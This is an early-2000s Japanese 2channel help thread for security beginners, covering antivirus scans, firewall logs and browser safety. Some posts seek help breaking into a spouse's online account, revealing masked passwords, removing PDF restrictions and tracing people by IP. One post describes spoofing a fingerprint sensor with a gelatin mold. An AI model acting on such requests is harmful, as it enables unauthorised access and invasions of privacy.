1 :
名無しさん@お腹いっぱい。 :
02/06/25 09:04 くだらない質問は新規でスレを立てたり関係ないスレに書き込まずにこのスレに書いてください
掲示板の荒らし方や侵入の方法、メールボムの送り方等、攻撃方法の質問はご遠慮ください。
2ちゃんねるでは荒らし依頼は出来ません。また、この板ではアタック依頼は受け付けません。
関連リンク
>>1-20 各種ファイアーウォール ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報
関連スレ・関連板、お約束、FAQ
ずれていたら
>>1-40 参照
(winなら)[Ctrl]キーと[F]キー(macなら)[コマンド]キーと[F]キーを同時に押すとページ内検索が出来ます
過去スレや関連スレの過去ログ等を調べてから質問してください
同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
答をもらえなくなるので、書き込んでしばしお待ちください。
お急ぎなら検索が早いかも?
http://www.google.com/intl/ja/
2 :
名無しさん@お腹いっぱい。 :02/06/25 09:05
3 :
名無しさん@お腹いっぱい。 :02/06/25 09:06
4 :
名無しさん@お腹いっぱい。 :02/06/25 09:07
5 :
名無しさん@お腹いっぱい。 :02/06/25 09:07
6 :
名無しさん@お腹いっぱい。 :02/06/25 09:08
【お約束】 ○ウィルスやブラクラのリンクを張るときは・・・ 他の方が誤ってクリックしても問題ないよう、直リンは避けてください。 ○アダルトサイトに行くときは・・・ インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ →ActiveX、JAVA、スクリプトを全て無効にしてください。 ○怪しいリンクを踏むときは・・・ view-source://URLでソースを表示して判断してください。Javaスクリプトなどは実行されません。 ○リンク先を直接見るときは・・・ 「対象をファイルに保存」して一旦ファイルにし、メモ帳で一度開いてください。 ○メールチェックをしたら、怪しいメールが届いていました・・・ 開かずに捨ててください。捨てようとしてクリックした時に感染する恐れがありますので、 OEのプレビュー機能を必ずオフにしてから削除してください。 ○IE4.0、IE5.0、IE5.5を使用しています・・・ IE4.0は今後不具合が発見されてもフォローされません。IE5.5SP2かIE6.0に乗り換えてください。 IE5.0、5.5の方はSP2にアップデートの後、各種パッチを当ててください。 ○ウィルス対策ソフトを入れていますが・・・ パターンファイル(ウィルス定義ファイル)を更新していなければ意味がありません。 感染する前に定期的にチェックしましょう。
7 :
名無しさん@お腹いっぱい。 :02/06/25 09:09
【FAQ他】
【IE&OE】
○OEのプレビューをオフにするには・・・
OEのメニューバーにある「表示」→「レイアウト」→「プレビューウィンドウを表示する」のチェックを外してください。
○メーラーにOEを使っていませんのでウィルスメールを開いても、自動的に実行したりしませんよね・・・
メーラーがOEでなくても、IEコンポーネントを利用してHTMLメールを表示する場合は、
IE、OEの不具合を引き継ぐことになります。ですので、自動的に実行しないとは言い切れません。
○アダルトサイト閲覧中に突然ファイルをDLして、デスクトップにアイコンが出来てしまいました・・・
アイコンのプロパティからリンク先を表示で出てきたファイルをアイコンとともに削除してください。
MS-DOSプロンプトを起動して、msconfigで見慣れないものを削除してください。
C:\windows\Downloaded Program Files\にあるファイルを削除してください。
MS-DOSプロンプトを起動して、scanreg /restoreも効果的です。
○いつの間にかIEのスタートページと検索のページが書き換えられていました・・・
ウィルス対策ソフトを試してみて、Trojan.JS.Offensiveならインターネットオプションから再設定してください。
【IPアドレス】
○IPアドレスを見るにはどうすれば・・・
自分のIPアドレスを見るにはMS-DOSプロンプトを起動して、winipcfg(9x系)かipconfig /all(NT系)を実行してください。
他人のIPアドレスを見るにはMS-DOSプロンプトを起動して、netstat -an
を実行してポートから判断してください。
○IPアドレスから個人情報が抜かれたり・・・
プロバイダがもっている情報は公権力が無い限り、外部に公開することは無いと信じてください。
それよりも、コンピューター上のファイルなどから判断することの方が容易かもしれません。
○IPアドレスから利用しているプロバイダを知りたいのですが・・・
>>2-5 の【Whois】を利用してください。
【掲示板】
○掲示板が荒らされて困っています・・・
注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖
冷静に判断、選択し、対応してください。困っているのは貴方だけではありません。
○掲示板の利用者のIPアドレスは抜けますか・・・
HTMLソースに書いてあることもありますが、無いこともあります。
○PCから携帯電話専用のページを見たい
UA(ユーザーエージェント、ブラウザなど)で判定しているページなら偽装で可能。
ただし、それで見られるページというのはあんまり…
8 :
単発質問の誘導よろしく :02/06/25 09:10
前スレで、フォントキャッシュ破損の質問が何回かあったので Win板のFAQももってきてみますた。
普通にネットとかしてて2日くらいで急にファイル数??が5000位 増えることありますか?? 特に何かをダウンしたわけでもないですが・・・。 一応はウイルスチェックは入れたんですが反応無くて・・・。 ノートンさんが優秀?みたいなのでダウン中ですがやっぱ怖くて・・・。 皆さん教えてください。
ソースネクストでウイルススキャンをダウンロード(分割で)しました。 マニュアル通り、ファイルをダブルクリックするが、展開しません。 で、「どのアプリケーションで開きますか?」と聞いてきます。 メールで問い合わせるが、1月以上返事も来ない。 電話しても常に話中でどうにもなりません。 御教授ください。 困っています。
>>11 なんで古いスレにマルチしてんの?間違いなら間違いでしたくらい書け
詫びの文もなしに新スレで同じ質問しゃあしゃあ書ける神経がわからん
>>12 Wクリックしたファイルの名前と拡張子くらい書け
つか100%それがexeじゃないだけだろ。
すいません・・・。 書いてきます。
>>12 糞ー巣ネクストとは関らないこれ鉄則。金払ってないなら他のにしる。
この板ではマカも評判悪いので、苦労したくなかったら、金払ってても他のにしる。
んで
>>11 =14の環境は?OSさえわからないんじゃ調べようがない
あと急に増えたファイルの拡張子。ウィルスじゃないなら
tmpファイルか?tmpは基本的には消しても平気だと思うが
ちなみにウィルス定義は最新だろうね?
いちおう、Temporary Internet filesが増えた!ってのはナシだぞ。 念のため
18 :
名無しさん@お腹いっぱい。 :02/06/25 10:58
なんで前スレより下がってるのかと小一時間age
最近(4,5日前)このスレの前すれ(908)で画像にウイルスがと言う内容で書いたんですが・・・。 OSはXpです。 何が増えたのかははっきり言ってわかりません・・・。 と言うか更新ファイル?を見たけどよくわからなくて。 普通にネットしてて5000も増えたこと無かったので異常かなと??
20 :
名無しさん@お腹いっぱい。 :02/06/25 11:10
>>19 インターネットキャッシュ消して、いくつファイル数減るか見たら?
IEだったらインターネットオプション→一時ファイルの削除
一度見たページの表示が若干遅くなるけど、たいした弊害じゃなし、
むしろIEなどで表示がおかしくなるのを回避できることが多いし。
>>19 んじゃなんでファイルが増えたってのに気付いたんだ?
どこに増えた?c:\windows\下か?
最近ウイルスチェックして〈2,3日前)(65000位)今日マウスの動きが変(上下にスクロールさせたら文字の大きさが変わる??) みたいな感じで、??って思ってウイルスチェックしたら(70000位に)増えてました。 何とか/何とかってファイル数でしたよね?? それともそこが私の勘違いですか?? しょうも無いこと聞いてすいません。
もう少し分かり易い文章書く努力してくれ・・・
それでその問題は
1、
>>19 の通りIEのキャッシュが増えただけ
削除法はIEのツールバーのツール→インターネットオプション→
インターネット一時ファイル→ファイルの削除
2、そもそもそれファイル数じゃなくて既知のウィルスの定義の数じゃないの?
3、その他、意図しないところでファイルが増えている
1の通りキャッシュクリアして、ファイル数が大体戻ったら1。
キャッシュクリアしてもウィルススキャンの表示されてる数がかわらなかったら2。
数は減ったがそれでも全然多いなら3。
今ノートンさん作動中なんですが、3だとやばいですか?? 原因は調べるには??
>>24 つうかあんたキャッシュは消したの?
原因を調べる(絞る)方法が
>>23 なんだが?
>>23 すいません・・・。 何がどう悪いかもわからず・・・。 ただ、普段と?変わらずつないでいただけなのに急に増えて・・・。
28 :
名無しさん@お腹いっぱい。 :02/06/25 11:46
>>27 だから何処にどのように表示される数字が増えたんだと聞いているんだ。
それがわからなきゃ答えようが無い。解決したかったら俺達にどの数字か伝える努力をしろ。
キャッシュは消しました。 数字とはウイルスチェックする際の数(全数)が 1ヶ月くらいは65000だったのです。 それなのに今朝不具合が出てたからチェックしたら70000を越してたのです。 わかりにくいとは思いますがこれでいいでしょうか??
だから漏れは
>>23 で書いた通り
>>23 の1、の手順でキャッシュを消し
ノートンで再度チェックをかけ、その数値がどうなるかで3通りに絞れるから
それを報告しろって言ったんだが、通じてないのか・・?
>>30 消したなら今もう一度ノートンでスキャンかけてその数値がどうなったか報告
すれって。パソコン初心者でも言ってることは理解できるだろ?
ノートンさんは相変わらず稼動中です。 現在49000位です・・・。 申し訳ありませんがしばらくお待ち下さい。
日本語が通じないやつ相手に大変だねぇ
>>30 これで定義済ウィルス数でないことは判明した。次は
>>31 をやって報告せよ。
サポセンって偉いよなぁ。
36 :
名無しさん@お腹いっぱい。 :02/06/25 12:01
もう寝るわ
寝るのか世w
遅くなりました。 ウイルスは無いみたいなんですが、やっぱり70000です。
キャッシュ消して数が全く変わらないって事はないだろ・・・ ノートンのその、スキャン後の画面キャプチャしてどっかにupしてくれると わかりやすいんだが、できんか? それとtempフォルダってデフォでどこだっけ? c:\windows\Temporary Internet files\だっけか?そのフォルダも開いた状態で キャプきぼーん。そのフォルダにファイル残ってたら漏れはこのウィンドウ閉じるがw
ていうか今度は90000を超えました。 何ででしょうか?? ウイルスバスターとノートンさんの調べるファイル数違うんですか?? チェック終ったと思ったのにまだ続いてる・・・。 ウイルスバスター(体験版)はアンインストールしたから減ると思ったのに何故??
バスターとノートンではファイル数の数え方が違うので、単純比較はできない。
最終的に10万超えてました・・・。 マスターブートレコード、ブートレコードってのは各1で後は0でした。 何が原因でしょうか??
1度閉じたスキャン結果はどうやって調べたら??
もっかい調べなおしてくれ
46 :
名無しさん@お腹いっぱい。 :02/06/25 12:40
>>44 NortonAntiVirus2002なら
「レポート」のところを開いて「活動ログ」の「レポートを表示」を
クリックしてみてくれ!
47 :
名無しさん@お腹いっぱい。 :02/06/25 12:57
IEをアップデートし終わってからスパイウェアをチェックしたら Alexaというのが発見されました レジストリをいじられている様なんですが 大丈夫でしょうか?
クリックしました。 コピーできないんですが、何か方法ありますか?? ていうか右クリックききません!!
49 :
名無しさん@お腹いっぱい。 :02/06/25 13:05
メッセンジャーのセキュリティ性をアップさせるにはどうすればいいのですか?
51 :
名無しさん@お腹いっぱい。 :02/06/25 13:18
>>50 ありがとうございました
まさかアップグレードでも入るとは思いませんでした
本当に助かりました
何回しても出来ません・・・。 何か設定がおかしいのでしょうか?? 一応もっかいスキャンしてます。
53 :
名無しさん@お腹いっぱい。 :02/06/25 13:28
>>52 何ができないんじゃー!?
1回でわかるように書けーっ!
前スレの974ですが結局メッセンジャーを使う上でセキュリティを高める方法は ないってことですか?
>>54 知らない人とは話さない。お菓子をくれるといっても駄目。
あかんわ。。。無駄に疲れた。。。もうだめだ
最後にこれだけ・・・キャプチャーのやりかた
1、スキャン終了した画面でキーボードの左上のほうにあるPrintScreen
(もしくはCopy)ボタンを押す
2、ペイント起動
3、ツールバーの編集→貼り付け
4、その画像保存してupload
以上・・・てかなんでこんなことを何度も何度も説明せなわからんのか・・・
ほんとサポの人尊敬するわ。Win板のサポスレに紹介しとこ・・・
てことで
>>53 あとはよろすく
大変ですな・・・
出来たので画像上げようとしてもさっきの所にあがりません・・・。 俺のところの環境が悪いのでしょうか??
>>59 もうややこしそうだし、変なことになってもいかんので、
画像アップロードの話は忘れてくれ。
画像が見られるなら手間かもしれんが書き写してくれ。
で、インターネット一時ファイルの削除はできたんだな?
念のためにもう1回やってみてくれ。
でウイルスチェックをする。でレポートを書き写す。
それから、インターネットでお気に入りのところを一回りするとかして
ウイルスチェック→レポートを書き写す。
大体それぐらいはファイル数が増えるってことだ。
ちょっとやってみそ。
正確に書き出す能力が無い(つか本人もファイルの数ですよね?とか言ってるし) から画像うpすれって言ってるんだと思うけど・・・ あまりにも、1を聞くのに10を教えなきゃいけない状態だし こっちが言ったこと1回の書き込みにつき2割程度しか理解&実行してないし まあ60さんが考えがあって、教えられるなら口出し無用だと思うけど。
>>61 >60だけど。
画像うぷすれの件は大体見ていたので分かっているつもりだけど
なんかドツボにはまってどうにもならなくなりそうなんで。
多分ちょっとしたことで失敗しているんではないかと思うけど。
で、とりあえず見られるところからやっていったらどうかと。
>>59 、その他
それから「素人」さんよ、マウスがおかしい、の件。
スクロールさせて文字の大きさが変わったと書いているが、
Ctrlキーを押しながらスクロールボタン(ホイール)を動かすと
大きさが変わるのが普通だよ。
問題があるのは、マウスじゃなくキーボードでは?
ShiftやCtrlがひっかかっていると、起動でおかしくなったり、
クリックのつもりがドラッグになったり変なことになるよ、よく。
64 :
名無しさん@お腹いっぱい。 :02/06/25 14:50
アパッチの設定で、DirectoryIndex という項目がありますが、
DirectoryIndex index.html
こういう風にすると、
http://myserver/docs/ これが →
http://myserver/docs/index.html こんな風に表示してくれますよね?ただ、同時にindex.htmlを置いてない場合
ディレクトリ構造が丸見えになってしまいます。
index.htmlに飛ばしつつ、index.htmlがなければ、
ディレクトリの中身を表示しない。ということは可能でしょうか?
>>64 DirectoryIndexはファイル名を指定しない時の検索順で、
「こんな風に表示させる」ためのものではないからな。
confなのかhtaccessなのか知らんが、Indexesをキーワードで
調べろ。
ついでに、板違いだ。
今突然ハードディスク入れる所が開いたんですけどなんなんですかねー?
>>66 珍しいな、CDの蓋が開いたとか演奏し始めたとかh結構あるのに。
WINDOWS98です。 ファイルに拡張子はついてないです。 全6ファイルで、ファイル名は以下のとおり CAKXSPVW(プロパティないの正式ファイル名をみるとSELF JOIN EXE) CAWDMJOL CAVRPBXN CAIRODUV CAQOGHFU キャンセルしたくても電話は不通。
>素人ですさん エクスプローラー → 検索 で、今日付けで作成されたファイルを検索して どんなファイルが増えているのか(ファイル名・拡張子・場所) まずは確認
72 :
名無しさん@お腹いっぱい。 :02/06/25 19:01
>>70 > ファイルに拡張子はついてないです。
フォルダオプションの表示で、拡張子を表示させるようにしてる?
デフォルトのままだと、表示されない場合もあるが。
それに「プロパティない(内?)の正式ファイル名」って。。。
もしかして、ショートカットなのかな?
ソースネクストで説明とQ&Aを見てきたけど、
VSOなんとか.exeっていうファイルができるみたいになっていたが。
お忙しい所すみません。 ファイルはデスクトップにダウンロードするよう支持があり、 ショートカットです。 今その6個のショートカットを1つのファイルに入れ、 フォルダオプションで、拡張子を表示するようチッックしましたが、 変化なしでした。
>>73 いや、ショートカットは拡張子関係ないんで。
一応元のところに戻してプロパティからどのファイルに
つながるショートカットか見て、
エクスプローラの検索などから、そのファイルがあるかどうか見て
みれば?ないようだったら再ダウンロード。
本音をいうと
>>15 に賛成だけどな。
75 :
名無しさん@お腹いっぱい。 :02/06/25 19:55
IDを隠したのに
>>1 =
>>10 は○○とバレました。
文体も全然違うのになんでバレたんでしょう?
IEだけで見てるヤシだけじゃないんだよとつっこまれました。
IDを隠してもバレるブラウザってあるんですか?
あったら教えてください。
77 :
(-_-) :02/06/25 20:02
>>77 ホームページビルダーで作られたページ。
特に怪しいソースなし。
ここって Proxomitron の質問してイイかなと思いつつ質問 これで串ってどうやって使用すればいいんでしょうか 外部プロクシのリストはいれたんですが… 串のIPになりません どうしてじゃろ
どうやったら串使えるかという説明キボン
82 :
名無しさん@お腹いっぱい。 :02/06/25 20:41
パスワード(*******など)をどっかにドラッグしてそのパスワードが見れるツールありませんでしたっけ? あったら教えてください。
どなたか教えてください。 OSのリカバリー後にNorton Internet Security2001を インストールし直したのですが、NISライブアップデート(定義更新) をしようとしたところ 「Windows Explorerがインターネットに接続しようとしています」 という警告が出ます。IEではなくExplorerです。 こんなことってあるのでしょうか? 当方Windows Me・IE5.50 マイドキュメントとメールデータはDドライブに保存、ウィルス感染歴なし
86 :
名無しさん@お腹いっぱい。 :02/06/25 22:00
初心者です。どなたか知恵をお貸し下さい。OEを使用しております。 this is new gameというメールが来たので開くと日本語の受信メール等が文字化け し、英語のメールなどは内容が消えてしまいました。復旧する方法もしくは 対応するスレを教えていただけませんか?
皆様のお知恵を貸してください! 以前、テレビである大学の教授によって 「指紋センサー」が、いとも簡単にやぶられていました。 材料は公開されませんでしたが、 ホームセンター等で簡単に手に入るそうです。 材料名とかはネット上ですので公開してほしくはありませんが、 なぜ、やぶられたのかを知りたいのです。 誰かご存知の方、教えてください。
>>86 KLEZって、んな症状でたかなぁ。。。はて。
文字化けはOutlook Express開いて、表示→エンコード、でしょうか。
>88さんへ 私も、以前、テレビ番組で見ました。 何か、簡単な材料で指紋センサーを騙してましたね(笑 俺も興味があるので、とりあえずage
92 :
名無しさん@お腹いっぱい。 :02/06/25 22:19
94 :
イー・アル・カンフー :02/06/25 22:20
>88 おいらも見た。なにか、ゼラチン質のような プルプルとした無色透明なモノを作って それで他人の指紋の型をとって、自分の指に付けたら 簡単にクリアしてた( ̄▽ ̄: あんなのでイイのかな?
93の人。ありがとう! さすが、2ちゃん! 情報の宝庫ですな。 またよろしゅうお願いします。
96 :
名無しさん@お腹いっぱい。 :02/06/25 22:25
毎回違う英語の題名で内容も全て英語で添付ファイルの付いたメールが毎日送られてきます。(ウィルス対策は済んでます。) 開いても英文が2行あるだけで何も起こりません。 以前はパソコンに来てましたが、最近は携帯メールにだけ送られてきます。 これって何ですか?やっぱりウィルスですか?
87の方レスありがとうございました。何とか復旧できました。
100 :
名無しさん@お腹いっぱい。 :02/06/26 00:22
セキュリティとして、まず不要なポートを塞ぎたいです。 要・不要のポートを教えて下さい。
ノートン先生(PFW)がこのように検知しました。(イベントタグの接続にて) ・日付: 2002/06/25 時刻: 23:17:56 接続: (略).ne.jp: smtp に oemcomputer: 1040, 55 バイトを送信, 132 バイトを受信, 1:01.125 経過 いつもの接続は、「〜に」という部分の「:」以下が固定されているのに、 今回は「smtp」に変わっていました。 (これが初めてなようで、この11分後にもまたこれになって接続されていました。) しかも、自分は数分しかPCを繋いでいないのに、 やたらと接続時間が長いんですけど、これって外部からのアクセスがあった ということになるんでしょうか?(どういうことなんでしょうか?) ちなみに、11分後のについては、以下になります。 ・日付: 2002/06/25 時刻: 23:28:34 接続: (略).ne.jp: smtp に oemcomputer: 1044, 2489 バイトを送信, 215 バイトを受信, 2.819 経過 なお、FWにては、これらの時間に一番近い時間で、2回アタックがありました。 関係があるのでしょうか? @・日付: 2002/06/25 時刻: 23:30:20 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 61.141.120.83,http A・日付: 2002/06/25 時刻: 23:30:22 未使用ポートブロック機能が通信をブロックしました。 詳細: インバウンド TCP 接続 リモートアドレス、 ローカルサービスは 61.141.120.83,http
101の一部 「いつもの接続は、「〜に」という部分の「:」以下が固定されているのに、 今回は「smtp」に変わっていました。」ですが、 変わっていた理由らしきものが分かりました。 あとの件はまだ分からずなので、 もし分かる方がいらしたらご回答をよろしくお願いいたします。
104 :
名無しさん :02/06/26 06:25
acrobat形式のファイルにセキュリティロックがかかっていて、 印刷、コピー等ができません。 どうやったらセキュリティ解除できますか? もしくは、どうやったら印刷できるようになりますか? 教えてください。
printscreenは?
>>101-102 ノートンが入っているから、トロイとかウイルスなどが外部接続してる可能性は低い。
変なアプリケーションが起動してなければ、気にする必要はないと思う。
未使用ポートについては、2ちゃんの串チェックみたい。
>>101-102 >変わっていた理由らしきものが分かりました。
解決したかったらわかってることは全部書け。こっちは神じゃないんだ。
SMTPはメル送信のときに使うポート。お前のパソ(oemcomputer)からメルが送信されたという事だ。
>>106-107 >>109 詳しいご説明、ほんとにありがとうございました。
また何かあったら、フォローよろしくお願いいたします。
それから109さん、「変わっていた理由らしきもの」というのは、
おっしゃるとおり、メール送信の時にそれが表示されていた、
ということでした。言葉が足らずですみませんでした。
たびたびすみません。
>>106 >未使用ポートについては、2ちゃんの串チェックみたい
とのことですが、この点について質問です。
2ちゃんに接続してない時にもアタックがあるんですが、どういうことでしょうか?
(2ちゃんに接続の時はどうかは今のところ未確認ですが・・・)。
例えば、このように連続してありました。
(httpからの場合、1回につき、いつも2〜3秒間隔で連続あります。)
・日付: 2002/06/26 時刻: 16:46:58
未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 61.126.205.77,http
・日付: 2002/06/26 時刻: 16:47:01
未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 61.126.205.77,http
ちなみに、見ていたサイトは、ごく一般のサイトです。
それから、使用しているのはWindows Me、マイクロソフトIE(ver.6.0)で、
インターネットオプションの設定の詳細設定では、
「HTTP 1.1設定」のところで、「HTTP 1.1を使用する」にしています。
「串接続で使用する」にはしていません。
なお、接続方法は、ダイアルアップです。
ブロックしてんならどうでもいいだろ
てゆーか、ほんまにただの流れ弾ちゃうんか
ほとんど知識がなくて恐縮なのですが、どなたかお答えいただけると幸いです。 個人の家のPCもADSLで繋ぎっぱなしだと、PCシャットダウンしてても 外部からアクセスされたりするのでしょうか? IEのホームのページをYahooにしてるのですが、クリックした覚えのないところが 表示済みでリンクが紫になっているのです。 かけた覚えのない海外への電話料金の請求書が来たりもします。 当方一人暮らしなので、家族等はありえません。 よろしくお願いいたします。
ありえない。そういうオカルトちっくな事疑う前に自分のしたこと全て思い出して 反省して悔い改めなさい。 君のような初心者にはインターネットオプション→セキュリティのつまみを 情事’高’にしとくことをおすすめする。ダウンロードすらできないが。 それとADSLなら海外にダイヤルなんて事は無いはずだが。 知り合いが知らん間にかけた、とかそっちのほう疑うのが現実的だと思うぞ どのくらいの額かにもよるが。
早々のレスありがとうございます。 そうなんですね。。。反省して悔い改めます。 海外への電話料金は騒ぐほどの高額の金額ではないです。 安心♪安心♪
>>113 知らなかったんですけど、
流れ弾、っていうのもあるんですか・・・。
ありがとうございました。
流れ弾っつうか IPアドレスxxx.xxx.xxx.0 - xxx.xxx.xxx.255の範囲をポートスキャン してるのとか。ピンポイントでポートスキャンじゃなくて適当に ポートをノックしてるようなのにいちいちどうすればいいだろうって 考えるだけ無駄なので放置でいいだろって事。ちなみに、PFWでログに残る ようなのの8割はこれだろ。(ルールちゃんと設定した状態でね)だから放置
>>116 国際通話の規制をした方がいいのでは?
その方が今後も安心してネットができると思います。
規制の仕方は、その担当のところにまず電話で申し込みます。
必要書類が送られてくるので、それを返信します。
控えは無かったと思うので、自分用の控えとして
コピーをとっておくのをおすすめします。
連絡先は、NTTの116にかけて聞けば教えてもらえます。
実際に規制が始まるまでには、その書類を返送して、
先方が処理してから始めて有効になるので、
早めに手続きをとることもおすすめします。
120 :
名無しさん@お腹いっぱい。 :02/06/26 23:44
最近のApacheとかOpenSSHのようなセキュリティホールの話題は、 この板ではどのスレでやっているんですか?
>>118 今、ログ見てみたんですけど、確かに教えてもらったふうでした。
詳しいご説明、どうもありがとうございました。
安心したと同時に勉強になりました。
また何かあったら、よろしくお願いいたします。
122 :
名無しさん@お腹いっぱい。 :02/06/26 23:53
>>120 そういうのはすぐ修正Verがでるからね
そういう議論はここよりもスラッシュドットのほうがいいだろ
>>ななすさま 親切にありがとうございます。 早速明日実行します。
124 :
名無しさん@お腹いっぱい。 :02/06/27 00:00
>>122 うーん、、
でも、Win系の話が多くて淋しい気もする。
125 :
名無しさん@お腹いっぱい。 :02/06/27 00:06
2ちゃんねるで起きた運営系の板、ニュース板などのログ消失は、 Apacheのバージョンが古かったため、セキュリティーホールを突かれたという説あり。
どっちもただのjpg つか激しく板違い
「勇気がなくて見れない画像解説スレ」か、ここは? しかも127親切だし。偉いなぁ。
129 :
名無しさん@お腹いっぱい。 :02/06/27 01:05
以前ふしあなさんに引っかかったけど実害は何ですか?
なんかアパッチのバージョンあげんの、メンドッチーので放置してたら、チョンコにクラクされちまったぜ。 データーふっとんだよ。どうしようか。
131 :
名無しさん@お腹いっぱい。 :02/06/27 01:43
名前欄に これ書くと2chログ見えるね → &rf&rusi&ran&ras&ran サーバが落ちまくってる今だけかもしれないけど。
134 :
名無しさん@お腹いっぱい。 :02/06/27 12:52
フリーメールとアウトルックを使うメールどっちが安全なのですか?
>>136 アウトルックを使う人が多いのはなぜなんですか?
フリーメールって何かメジャーな気がしないのですが。
138 :
名無しさん@お腹いっぱい。 :02/06/27 13:08
>>137 OutlookならOffice入れるとたいてい入れられるから。
Outlook Express ならOfficeなしでもWinに最初からあるから。
でもって、ヲジ様方はなんかMSのものはいいと思いこんでいるから。
>>138 みんなフリーメールの登録がだるいんですね。
MSと安全だと思い込んで、そのままアウトルックを使用しているんですね?
140 :
名無しさん@お腹いっぱい。 :02/06/27 13:16
スパイソフトをAD-awareを使って駆除したのですが、 ネットワーク接続のところに作成されてしまった接続が削除できません。 無効にはできるんですが…… 方法を教えてください。お願いします。
>>139 ていうか、対象がおかしくねーか?
プロバからいわゆる本メアドってのをもらうよな
その本メアドからメールを降ろしたり送信したりするクライアントソフトが
Outlook/OE。
フリメはどっかの無料鯖に自分のメールアカウントを新規にとって、
ブラウザでメール送受信などの操作するものの総称。
OEがクソなのは間違いないが、それの代替手段として考えるには
フリメじゃなくて、EdMaxとか電八とかの 3rd party のメーラーだろ。
>>140 ダイヤルアップネットワーク開いてそこのアイコン
削除すれば消えるじゃん。
クラッカーってなんでくるんですか? どこかやばいサイトにいったからですか?
144 :
名無しさん@お腹いっぱい。 :02/06/27 13:29
>142 そのアイコンを削除しようとしてもできないんです。 右クリックしても、削除の文字が灰色で選択できなくなってます。
146 :
名無しさん@お腹いっぱい。 :02/06/27 14:51
ローカルエリア接続無効 Realtek RTL 8139 Fami…… ローカルエリア接続1 有効 ADSLmodem-SU 1394接続 1394ネットアダプタ ってなってます。
147 :
名無しさん@お腹いっぱい。 :02/06/27 14:52
訂正 あ、二行目 ローカルエリア接続2です。 で、1394っていうのも無効です。
148 :
名無しさん@お腹いっぱい。 :02/06/27 16:07
FWのログ見て、脳豚のせいで接続できないなら FWが蹴った部分ログに残ってるだろうから、そこ見てみたら?
>>149 、、、それが
ノートンのログを見たのですが、ログに、残っていません。
つまり、
現在のノートンの規則には掛からない、
アラートが表示されて、新しい規則を設定するように
促される事もありません。(T_T)
追記:
・ルーターは使用していません。
・オミトロンを使用しています。
※ノートンをオフにして正常に接続できた時もオミトロンは
通常どおり利用していました。
152 :
名無しさん@お腹いっぱい。 :02/06/27 19:07
TCPポート:51402を誰かがつついてるみたいなんだけど、 TCPポート:51402はなんなの? 教えてください
153 :
名無しさん@お腹いっぱい。 :02/06/27 19:09
ウイルスバスターは一年に一回3150円払うだけでソフトのバージョンアップと ウイルス定義ファイルの更新ができるみたいだけどノートンインターネット セキュリティーはウイルス定義ファイルのみ。 ってかいてあるけどこれはやっぱりウイルスバスターのほうがお得なの?
今日の午後からウィルスとおぼしいメールが届くようになりました。 それだけなら、以前からも良くある事なのですが。 ただ、今日のは今までのモノと違って添付ファイルが1回に付き2つで、 しかもファイル名はno_filename(速攻で削除したのでうろ覚え)なのです。 これもklezの一種なんでしょうか…。
155 :
name_Not_Found :02/06/27 19:16
fusianasanで、ホスト?出てくるじゃあないですか。 アレさえ分かってしまえば、 悪意ある人からいつ攻撃を受けてもおかしくないんですよね? IRCを使いたいのだが、串を通してもソレが出てしまい困っています。 何とかならんのでしょうか?
SocksCap
あの・・・全く初心者で知識が無くて 申し訳ないんですが、 ウチの旦那が出会い系サイトの会員になって、 ネット上のメールを使ってやりとりしている 様なんです。ログインのIDナンバーはオートコンプリート(?) で残っていて分かるのですが、パスワードが記憶させてない らしく判りません。心当たりの言葉は全て入れたし、 IDナンバーから秘密の質問というのも分かった のですが、そっちの答えも判りません。(それが 分かるとパスワードも分かるらしいです)そういうのって なんか、分かる方法あるんでしょうか?このまま ではすごく疑心暗鬼の毎日で・・・もし、 どなたか分かる人がいたら教えて貰えないでしょうか?
そうなんですか・・・やっぱり。 ハア・・・判りました。 すいません、ありがとうございました。
ウイルスバスターは一年に一回3150円払うだけでソフトのバージョンアップと ウイルス定義ファイルの更新ができるみたいだけどノートンインターネット セキュリティーはウイルス定義ファイルのみ。 ってかいてあるけどこれはやっぱりウイルスバスターのほうがお得なの?
>>154 今はそれだけでは判断できない時代。
>>160 ノートンの更新についつは知らないので、ノートンスレで聞いてください。
162 :
name_Not_Found :02/06/27 20:29
>>155 fusianasanとIRCの関係がよく分からないが…
間違ってfusianasanしてしまったら回線切って暫らく待てばリモホは変わる。
>160 それより検出力やらトラブル事例の有無やら、 そっちの方が大事だと思うけど
依然TCPポートの50000番台がつっつかれています。(55838とか56307を) ひょっとしてトロイのバックドアなんでしょうか。 ご存知の方がいらっしゃったら教えてください。
>>166 sourceポートが80だったら氏なす。
すみません、sourceポートとは何でしょうか、 またどこを見れば解るのでしょうか
方法論ではなく可能性についてだけ教えていただきたいのですが、 今回の2ちゃんのログ消失騒動ですが、 スクリプト軽量化コンテスト参加者なら ルート権限とってログをデリることは可能だと思いますか?
可能性なら万人にある。だから、 その「スクリプト軽量化コンテスト参加者なら」という条件は 何ら意味を成さない。
>>171 すみません。質問がまずかったですね。
使えるスクリプトがわかればバックドアから入れる可能性は
増大しますか?という意味です。
>>170 可能性は極めて低い(はず)。bbs.cgiはperlで書く事が条件だったはずなので、
mariciousコードをもぐりこませることはほぼ不可能。
あるとすればコーディングのバグかインタプリタのバグかだな
>>173 そうですか。知っているだけでは駄目なんですね。
>>174 厨な質問で申し訳ないのですが、
それは、鯖の問題と言う意味ですか?
噂によればperlのヴァージョンが古かったと聞いたのですが、
その関係なのでしょうか?
74さんはじめ、皆様、ありがとうございました。 みなさんも、ウイル〇スキャンは止めろと言うので、 ソース〇クストに、「キャンセルする〜」とメールを送ったら、 1月以上音信不通だっがのが、急に解答が来ました。 ダウンロードする時、かってにファイル名が リネームされてたらしいので、ダウンロードの前に、 教えてもらった正しい名前を入力したら、うまく行きました。 キャンセルしたかったのですが、とりあえず、使ってみます どうも、ご親切、ありがとう。
IPから個人情報を検索するHPを教えてください。
googleセンセに聞いてくれ
>>179 あらま、そうなの?
警察庁タンいつの間にそんなシステムを・・・
要するに事件なら警察に訴え出て調べて貰えてコトでしょ んで、そうじゃないなら諦めろてコトでしょ
>>181 警察庁に言っても困られるだけだと思うぞ。
